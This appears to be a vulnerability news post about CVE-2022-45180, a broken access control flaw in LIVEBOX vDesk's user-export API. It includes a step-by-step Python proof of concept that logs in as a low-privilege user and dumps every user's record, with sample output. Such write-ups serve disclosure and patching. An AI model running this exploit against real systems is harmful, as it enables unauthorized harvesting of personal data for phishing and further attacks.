CVE CyberSecurity Database News

CVE-2022-45180 - Exploiting Broken Access Control in LIVEBOX Collaboration vDesk (up to v018)

Poster -

Secure collaboration tools are essential for businesses, especially as remote work has become the norm. Unfortunately, even popular platforms sometimes harbor critical security flaws that put sensitive data at risk. One such vulnerability, CVE-2022-45180, affects the LIVEBOX Collaboration vDesk platform. In this post, we'll take a detailed look at how this flaw works, walk through an attack with real code snippets, and explain what it means for users and administrators.  

What is CVE-2022-45180?

CVE-2022-45180 is a "Broken Access Control" vulnerability in LIVEBOX Collaboration vDesk, affecting all versions up to v018. The problem lies in the /api/v1/vdesk_{DOMAIN}/export endpoint, which is supposed to only let administrators export user information. But in reality, any authenticated user, no matter their privilege level, can use this endpoint to extract details about every user in the system.

Why Is This a Big Deal?

- Sensitive Exposure: An attacker with any account (even the lowest-level user) can download a full list of user data meant only for admins.
- Stepping Stone: Attackers could use harvested user information for phishing, social engineering, or further attacks.

Technical Details

The endpoint in question is:  

POST /api/v1/vdesk_{DOMAIN}/export


This endpoint lacks proper privilege checks.

Vulnerable Flow (How it Does Work)

- Any authenticated user (user, manager, etc) can send a request to /api/v1/vdesk_{DOMAIN}/export and get data on every system user.

How to Exploit CVE-2022-45180

Prerequisite: You have a valid vDesk username and password (no admin needed).

First, authenticate to vDesk to get your session token. This might look something like this

import requests

url = "https://vdesk.example.com/api/v1/login";
payload = {
    "username": "bob@notadmin.com",
    "password": "weakpassword123"
}
r = requests.post(url, json=payload)
token = r.json()["token"]  # Example, real response may differ

Use the token to call the export endpoint. Example in Python

export_url = "https://vdesk.example.com/api/v1/vdesk_companyxyz/export";
headers = {
    "Authorization": f"Bearer {token}"
}

export_payload = {
    "exportType": "all_users"
}

exp = requests.post(export_url, json=export_payload, headers=headers)
print(exp.text)  # This will show probably a CSV or JSON dump of all users

Step 3: Analyze the Data

You will receive a file (most likely CSV, JSON, or similar) containing names, emails, roles, and possibly more internal info about all users in the system.

The attacker may receive data like

[
  {
    "id": "1",
    "username": "admin",
    "email": "admin@companyxyz.com",
    "role": "Administrator"
  },
  {
    "id": "2",
    "username": "jdoe",
    "email": "jdoe@companyxyz.com",
    "role": "User"
  }
  // ... hundreds more
]

Original References and Further Reading

- CVE-2022-45180 on cve.org
- LIVEBOX Collaboration Homepage
- OWASP Broken Access Control

Summary

CVE-2022-45180 exposes a clear and present danger to organizations using LIVEBOX vDesk up to version 018. Any logged-in user can abuse a broken access control check to dump sensitive user data they should never see. All affected users and sysadmins should patch now, monitor their systems, and look out for suspicious activity.

If you run vDesk, treat this as a priority—because attackers aren't waiting for you to act.

Timeline

Published on: 04/14/2023 14:15:00 UTC
Last modified on: 04/19/2023 19:28:00 UTC